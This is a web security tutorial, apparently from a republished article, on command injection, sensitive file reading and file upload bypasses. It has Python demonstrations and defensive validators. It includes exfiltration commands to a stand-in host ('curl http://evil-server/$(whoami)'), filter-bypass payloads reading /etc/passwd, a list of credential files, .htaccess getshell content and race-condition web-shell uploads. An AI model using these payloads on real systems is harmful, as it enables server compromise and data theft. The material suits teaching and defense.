What are the skills of command injection in WEB security

2025-01-16 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--

This article covers command injection techniques in web security: where the vulnerability appears, the functions that introduce it, how injected commands are delivered and confirmed without output, how common filters are bypassed, and how to defend. It closes with related notes on sensitive file reading and file upload attacks.

Command injection

3.5.1. Brief introduction

Command injection is a vulnerability in which a web application concatenates untrusted input into a system command that is then executed on the server.

It typically appears where an external program is invoked to provide a feature: management interfaces that configure the hostname, IP address, netmask or gateway, display system information, or shut down and restart the device; or sites that offer ping, nslookup, mail sending, image conversion and similar functions.

3.5.2. Common dangerous functions

3.5.2.1. PHP

● system

● exec

● passthru

● shell_exec

● popen

● proc_open

3.5.2.2. Python

● os.system

● os.popen

● subprocess.call (and the other subprocess helpers when called with shell=True)

● os.spawn*

3.5.2.3. Java

● java.lang.Runtime.getRuntime().exec(command)

3.5.3. Common injection modes

● ; command separator

● || and & / && separators

● | pipe

● %0a / %0d line feed and carriage return

● `...` backtick command substitution

● $(...) command substitution
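The following is an added example, not code from the original article: it drives each injection mode above through a deliberately vulnerable function and records whether the injected command actually ran. The real application would concatenate the input into something like "ping -c 1 " + host; here the command is replaced by echo so the example runs offline, and the marker string, the payloads and the stand-in command are assumptions of this example.

```python
import subprocess

MARKER = "INJECTED"


def run_vulnerable(host: str) -> str:
    """The vulnerable pattern: untrusted input concatenated into a shell command.

    shell=True hands the string to /bin/sh -c exactly as PHP's shell_exec or
    Python's os.system would. echo stands in for ping so this runs offline.
    """
    cmd = "echo target=" + host
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def was_injected(output: str) -> bool:
    """True only when the injected echo executed; a payload merely printed back
    as text (for example after quoting) does not count."""
    return any(line.strip() in (MARKER, "target=" + MARKER) for line in output.splitlines())


# One payload per injection mode; the host part stays a valid-looking IP.
PAYLOADS = {
    ";": f"127.0.0.1; echo {MARKER}",
    "&&": f"127.0.0.1 && echo {MARKER}",
    "||": f"127.0.0.1 || echo {MARKER}",   # only fires if the first command FAILS
    "&": f"127.0.0.1 & echo {MARKER}",
    "|": f"127.0.0.1 | echo {MARKER}",
    "%0a": f"127.0.0.1\necho {MARKER}",    # what %0a decodes to on the server
    "``": f"`echo {MARKER}`",
    "$()": f"$(echo {MARKER})",
}


def probe_injection_modes() -> dict[str, bool]:
    """Run every payload and report which separators led to execution."""
    return {mode: was_injected(run_vulnerable(payload)) for mode, payload in PAYLOADS.items()}


if __name__ == "__main__":
    for mode, hit in probe_injection_modes().items():
        print(f"{mode:>4}: {'executed' if hit else 'not executed'}")
```

The || case is the one to note: because the stand-in command succeeds, the right-hand side never runs, which is exactly why || only works against a target whose first command can be made to fail (an unreachable host for ping, for example).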

3.5.4. Techniques when there is no echo

● bash reverse shell

● DNS out-of-band data

● HTTP out-of-band data

curl http://evil-server/$(whoami)

wget http://evil-server/$(whoami)

● when no out-of-band channel is available, construct Boolean conditions with sleep or other logic and infer the result from the response time
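The DNS channel above has limits that the one-line curl/wget payloads do not: a label may hold at most 63 characters, a full name at most 253, and names are case-insensitive. The following added example (not from the original article) encodes command output into valid query names on the attacker's side and reassembles it from the resolver log; the zone name oob.example, the use of od instead of xxd in the injected string, and the sample data are assumptions of this example.

```python
MAX_LABEL = 63   # RFC 1035 label limit
MAX_NAME = 253   # limit for a full name in text form


def encode_for_dns(data: bytes, zone: str) -> list[str]:
    """Split data into names of the form "<seq>.<hex>.<hex>...<zone>".

    Hex rather than base64: DNS names are case-insensitive and resolvers may
    change case in transit, so the encoding must survive that.
    """
    if not data:
        raise ValueError("nothing to encode")
    hexed = data.hex()
    names, seq, pos = [], 0, 0
    while pos < len(hexed):
        labels = []
        budget = MAX_NAME - len(zone) - len(str(seq)) - 1  # room after "<seq>." and zone
        while pos < len(hexed):
            take = min(MAX_LABEL, len(hexed) - pos, budget - 1)  # -1 for this label's dot
            if take <= 0:
                break
            labels.append(hexed[pos:pos + take])
            pos += take
            budget -= take + 1
        if not labels:
            raise ValueError("zone name leaves no room for data")
        names.append(".".join([str(seq), *labels, zone]))
        seq += 1
    return names


def decode_from_dns(names: list[str], zone: str) -> bytes:
    """Reassemble the data from logged queries, whatever order or case they arrived in."""
    suffix = "." + zone.lower()
    chunks = {}
    for name in names:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            raise ValueError("query for a different zone: " + name)
        seq, *labels = name[:-len(suffix)].split(".")
        chunks[int(seq)] = "".join(labels)
    return bytes.fromhex("".join(chunks[i] for i in sorted(chunks)))


def oob_dns_payload(zone: str) -> str:
    """The string injected on the target (illustration only, never executed here).
    od is POSIX, so it is more likely to exist than xxd; whoami is short enough
    to fit one label, longer output needs the chunking above done target-side."""
    return f"nslookup $(whoami | od -An -tx1 | tr -d ' \\n').{zone}"


def timing_payload(seconds: int = 5) -> str:
    """Boolean inference without any channel: the response is delayed only if
    the condition holds (here: the command runs as root)."""
    return f"; [ $(id -u) = 0 ] && sleep {seconds}"
```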

3.5.5. Common bypass methods

3.5.5.1. Whitespace bypass

● < symbol in place of the space: cat</bin/ls

● ${IFS} variable: cat${IFS}/etc/passwd

3.5.5.2. Keyword bypass

● quote concatenation: cat /etc/pass'w'd

● undefined (empty) variable: cat$x /etc/passwd

3.5.5.3. Length limit bypass

>com

>'foo.\'

>'wget \'

ls -t>a

sh a

Each line uses a bare redirection to create an empty file whose name is a fragment of the intended command; ls -t then writes those names into a file, and sh executes that file. Two details make the chain work. First, ls -t lists newest first, so the fragments are created in reverse order (the output file a is itself the newest entry and becomes a harmless first line that fails with "not found"). Second, a name that ends in a backslash becomes backslash-newline in the listing, which the shell reads as line continuation, so wget \, foo.\ and com join into the single command wget foo.com. In some interactive shells (zsh, whose NULLCMD defaults to cat) a bare redirection reads standard input until Ctrl+D, so there a short command has to be placed before the >; one-character commands such as w and [ can be found with ls /usr/bin/?. When PHP runs the command through shell_exec and similar functions, no standard input is attached and /bin/sh creates the file immediately from the bare redirection.
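As an added example (not code from the original article), the chain above can be reproduced end to end: each fragment is handed to sh -c in a scratch directory, as a vulnerable application would do with one request each, under an assumed 8-byte limit per request. The command assembled is rm flag rather than wget foo.com so the result can be checked offline; the limit, the file names and the scratch directory are assumptions of this example.

```python
import os
import subprocess
import tempfile
import time


def run_as_injected(cmd: str, cwd: str) -> None:
    """One injected request: the application hands cmd to /bin/sh -c, as
    shell_exec or os.system would, with the working directory as cwd."""
    subprocess.run(["sh", "-c", cmd], cwd=cwd, capture_output=True)


def length_limit_chain(workdir: str, limit: int = 8) -> tuple[list[str], bool]:
    """Build and run the script in workdir; return (script lines, flag still exists).

    Target command: rm flag. Fragments are created in REVERSE order because
    ls -t lists newest first. The name "rm \\" ends in a backslash, which turns
    into backslash-newline in the listing: sh joins it with the next line.
    Single quotes keep the trailing backslash literal inside sh -c.
    """
    fragments = [
        ">flag",      # second script line (created first, so listed last); also the target file
        ">'rm \\'",   # first script line: the file named "rm \"
    ]
    for frag in fragments:
        assert len(frag) <= limit, frag
        run_as_injected(frag, workdir)
        time.sleep(0.05)          # keep modification times distinct for ls -t
    run_as_injected("ls -t>a", workdir)   # a is newest: it becomes a harmless first line
    run_as_injected("sh a", workdir)
    with open(os.path.join(workdir, "a")) as fh:
        lines = fh.read().splitlines()
    return lines, os.path.exists(os.path.join(workdir, "flag"))


def demo() -> tuple[list[str], bool]:
    """Run the chain in a temporary directory and return its evidence."""
    with tempfile.TemporaryDirectory() as scratch:
        return length_limit_chain(scratch)


if __name__ == "__main__":
    script, flag_left = demo()
    print("script executed by sh a:", script)
    print("flag removed:", not flag_left)
```

The returned script is ["a", "rm \\", "flag"]: the first line fails harmlessly, the second and third join into rm flag, and the flag file created by the first fragment is gone, which is the proof that the reassembled command ran.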

3.5.6. Common symbols

3.5.6.1. Command delimiters

● %0a / %0d (line feed / carriage return)

● ;

● & / &&

● | / ||

3.5.6.2. Wildcard character

● * zero or more of any character

● ? exactly one arbitrary character

● [abcd] one of the characters listed in the brackets

● [a-z] one character from the range, in encoding order

● [^abcd] one character not listed in the brackets

3.5.7. Defense

● disable the relevant functions when they are not needed

● avoid executing external programs or commands where possible

● validate the format of the input, preferably against a whitelist

● escape every shell metacharacter in the command if a shell cannot be avoided

Shell metacharacters include # & ; ` , | * ? ~ ^ ( ) [ ] { } $ as well as < > \ the quote characters and the newline
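The last two defenses in practice, as an added example that is not code from the original article: the parameter is checked against a hostname whitelist (which excludes every metacharacter above by construction rather than by blacklist), the program is started with an argument vector so no shell ever parses the value, and shlex.quote is kept as the fallback for the case where a shell is unavoidable. The real command would be ping -c 1 <host>; the stand-in below just prints its argument so the example runs offline, which is an assumption of this example.

```python
import re
import shlex
import subprocess
import sys

# Hostname / IPv4 whitelist: letters, digits, dot and hyphen, each label
# 1-63 characters, not starting with a hyphen (so it cannot be read as an option).
HOST_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def validate_host(host: str) -> str:
    """Reject anything outside the whitelist; the caller never sees a bad value."""
    if not HOST_RE.fullmatch(host):
        raise ValueError("rejected host parameter: %r" % host)
    return host


def ping_argv(host: str) -> list[str]:
    """Argument vector for the ping call, built without a shell.

    In production this would be ["ping", "-c", "1", host]; the interpreter
    stand-in prints its argument so the example can run anywhere.
    """
    validate_host(host)
    return [sys.executable, "-c", "import sys; print('target=' + sys.argv[1])", host]


def run_hardened(host: str) -> str:
    """Validate, then execute the vector directly (no shell=True)."""
    return subprocess.run(ping_argv(host), capture_output=True, text=True).stdout


def run_literal_argv(text: str) -> str:
    """What argv passing does on its own, without validation: the payload
    reaches the program as one literal argument and is never parsed by sh."""
    argv = [sys.executable, "-c", "import sys; print('target=' + sys.argv[1])", text]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def escape_for_shell(text: str) -> str:
    """Last resort when a shell string is unavoidable: quote the whole argument."""
    return shlex.quote(text)
```

Compare with the vulnerable concatenation in 3.5.3: the same payload 127.0.0.1; echo INJECTED is refused by validate_host, and even without validation run_literal_argv prints it back as text instead of executing it.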

3.6. File reading

Consider reading files that may contain sensitive information.

● sensitive files in the user's home directory

.bash_history

.zsh_history

.profile

.bashrc

.gitconfig

.viminfo

passwd

● application configuration files

/etc/apache2/apache2.conf

/etc/nginx/nginx.conf

● application log files

/var/log/apache2/access.log

/var/log/nginx/access.log

● sensitive files in the site directory

.svn/entries

.git/HEAD

WEB-INF/web.xml

.htaccess

● special backup files

.swp

.swo

.bak

index.php~

...

● Python cache

__pycache__/__init__.cpython-35.pyc

3.7. File upload

3.7.1. File type detection bypass

3.7.1.1. Change request bypass

Some sites check the file type only in the front end; such checks are bypassed by editing the request directly. Likewise, some sites check only information from the HTTP headers on the back end, such as Content-Type, and since the client controls those headers this check is bypassed the same way.

3.7.1.2. Magic detection bypass

Some sites detect the file type from the file header, which can be bypassed by prepending the corresponding bytes to the shell. The header bytes of several common file types are shown in the following table.

3.7.1.3. Suffix bypass

Some services determine the file type only from the filename suffix, the upload metadata or the magic header; when that is the case, the suffix is the check to bypass.

For historical reasons, some PHP interpreters accept suffixes matching the regular expression /ph(p[2-7]?|t(ml)?)/, for example php / php5 / pht / phtml, and some configurations also map shtml / pwml / phtm; these can be tested when uploading .php files is forbidden.

JSP engines may parse suffixes such as jspx / jspf / jspa / jsw / jsv / jtml, while ASP supports suffixes such as asa / asax / cer / cdx / aspx / ascx / ashx / asmx / asp{80-90}.

Beyond these, other suffixes can also cause problems, such as vbs / asis / sh / reg / cgi / exe / dll / com / bat / pl / cfc / cfm / ini.

3.7.1.4. File system name bypass

On Windows, a file uploaded as index.php. is stored as index.php because the file system strips the trailing dot, which bypasses a suffix check. Names such as index.php%20 (a trailing space after decoding), index.php:1.jpg and index.php::$DATA (NTFS alternate data streams) can also be tried. On Linux, try uploading a file named index.php/. or ./aa/../index.php/.

3.7.1.5. .user.ini

Besides the main php.ini, PHP scans for INI files in each directory, starting from the directory of the executed PHP file and walking up to the web root (as given by $_SERVER['DOCUMENT_ROOT']). If the executed file is outside the web root, only its own directory is scanned. Any option whose mode is not PHP_INI_SYSTEM can be set in .user.ini, so a .user.ini plus a file with a non-PHP suffix is enough to construct a shell, for example auto_prepend_file=01.gif.

3.7.1.6. WAF bypass

Some WAFs, for performance reasons, inspect only part of the request body, so padding the request with a large amount of junk data pushes the payload past the part that is inspected.

In addition, the WAF and the web application may parse the multipart boundary differently, so a malformed boundary can be used to make the WAF see a different upload than the application does.

3.7.1.7. Competitive upload bypass

Some servers save the uploaded file first and delete it afterwards if it is judged illegal. Against such a server, repeatedly upload a file that writes a web shell when executed and request it at the same time; after enough attempts the request lands in the window between save and delete and the shell is obtained.

3.7.2. Attack skill

3.7.2.1. Apache rewrites GetShell

When Apache permits .htaccess overrides (AllowOverride), consider uploading a .htaccess file with the content:

AddType application/x-httpd-php .png

php_flag engine 1

Files with a .png or any other chosen suffix are then executed as PHP scripts.

3.7.2.2. Soft link to read any file

When an uploaded archive is unpacked on the server, consider an archive that contains symbolic links. If the server does not guard against them, the link is created on disk and reading it (or a file written through it) yields arbitrary file read.
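The server-side check for this, as an added example that is not part of the original article: the archive is inspected before extraction and every symlink entry or traversal name is reported. Symlinks are rejected outright rather than having their targets validated, because a link to a directory followed by a member written through that link would still escape the extraction root. The sample archive is constructed in the code and is not a real upload; its member names and link target are assumptions of this example.

```python
import io
import posixpath
import re
import stat
import zipfile


def unsafe_zip_members(zip_bytes: bytes) -> dict[str, str]:
    """Map member name -> reason for every entry that must not be extracted."""
    bad = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            # Unix-created archives keep the mode bits in the high 16 bits;
            # a symlink entry stores its target as the member data.
            mode = info.external_attr >> 16
            if stat.S_ISLNK(mode):
                bad[name] = "symlink -> " + zf.read(info).decode("utf-8", "replace")
                continue
            normalized = posixpath.normpath(name.replace("\\", "/"))
            if (name.startswith(("/", "\\")) or normalized == ".."
                    or normalized.startswith("../") or re.match(r"^[A-Za-z]:", name)):
                bad[name] = "path traversal: " + name
    return bad


def safe_members(zip_bytes: bytes) -> list[str]:
    """Names that may be extracted; everything else is skipped, not sanitized."""
    bad = unsafe_zip_members(zip_bytes)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [n for n in zf.namelist() if n not in bad]


def build_sample_zip() -> bytes:
    """Constructed sample: one harmless file, one symlink entry pointing at
    /etc/passwd, one traversal name (example data, not a real upload)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("images/readme.txt", "harmless")
        link = zipfile.ZipInfo("images/passwd_link")
        link.external_attr = (stat.S_IFLNK | 0o777) << 16   # mark the entry as a symlink
        zf.writestr(link, "/etc/passwd")                    # link target travels as the body
        zf.writestr("../../var/www/html/shell.txt", "traversal")
    return buf.getvalue()


if __name__ == "__main__":
    for member, reason in unsafe_zip_members(build_sample_zip()).items():
        print(member, "=>", reason)
```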

3.7.3. Protective skills

● use a whitelist to restrict the types of uploaded files

● use stricter file type checks (content, not just suffix or headers)

● prevent the web server from executing or interpreting anything in the upload directory, and store files under server-chosen names
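An upload validator that applies these three rules against the bypasses described in 3.7.1, as an added example that is not code from the original article. Every dotted segment of the name is checked against the executable suffixes listed in 3.7.1.3, so double extensions fail; the name whitelist refuses the trailing dots, spaces, colons and path components from 3.7.1.4; the magic bytes are compared with the extension, not trusted on their own; and the stored name is chosen by the server. The accepted image types, their signatures and the sample inputs are assumptions of this example.

```python
import re
import secrets
from typing import Optional

# Accepted extensions and the magic prefixes each must start with.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Suffixes that some interpreters execute (3.7.1.3) plus server-config names
# (3.7.1.5, 3.7.2.1). Matched against EVERY segment after the first, so
# "shell.php.png" is refused as well as "shell.php".
EXECUTABLE_SEGMENT = re.compile(
    r"^(ph(p[2-7]?|t(ml)?)|phtm|shtml|pwml|jspx?|jspf|jspa|jsw|jsv|jtml|"
    r"asp|asa|asax|cer|cdx|aspx|ascx|ashx|asmx|htaccess|ini)$", re.IGNORECASE)

# Whole-name whitelist: no path separators, leading dots, spaces, percent
# signs, colons (NTFS streams such as ::$DATA) or trailing dots get through.
NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]*(\.[A-Za-z0-9]+)+$")


def reject_reason(filename: str, data: bytes) -> Optional[str]:
    """Return why the upload is refused, or None when it passes every check."""
    if not NAME_RE.fullmatch(filename):
        return "filename outside whitelist (path, dot, space, colon or special char)"
    segments = filename.lower().split(".")
    for seg in segments[1:]:
        if EXECUTABLE_SEGMENT.fullmatch(seg):
            return "executable or server-config suffix: " + seg
    ext = segments[-1]
    if ext not in ALLOWED_TYPES:
        return "extension not in whitelist: " + ext
    if not data.startswith(ALLOWED_TYPES[ext]):
        return "content does not match the magic bytes for ." + ext
    return None


def stored_name(filename: str) -> str:
    """Server-chosen random name: the client never picks the stored path, so a
    polyglot that passed the magic check still cannot pick an executable name."""
    ext = filename.rsplit(".", 1)[1].lower()
    return secrets.token_hex(16) + "." + ext
```

Note what the magic check does not catch: GIF89a<?php ... ?> in a file named polyglot.gif passes, which is why the random rename and a no-execute upload directory are listed as separate defenses rather than relying on content checks alone.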


© 2024 shulou.com SLNews company. All rights reserved.
